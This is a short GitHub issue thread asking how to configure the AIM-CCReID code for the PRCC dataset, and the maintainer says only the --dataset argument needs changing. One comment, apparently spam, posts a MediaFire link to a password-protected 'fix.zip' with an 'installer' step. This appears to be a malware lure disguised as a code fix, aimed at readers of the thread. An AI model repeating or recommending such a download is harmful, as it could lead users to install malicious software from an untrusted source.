### ISSUE TITLE
code fixes for PRCC

### ISSUE THREAD

**Issue by woonwoon** [BoomShakaY/AIM-CCReID#14]
Is there any part of the code other than   _C.DATA.DATASET = 'prcc'   that needs to be fixed to run it as PRCC?

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by BoomShakaY** [comment]
I think the only part that needs to be modified is the --dataset when you run scripts and call the main.py. The config files will merge it.
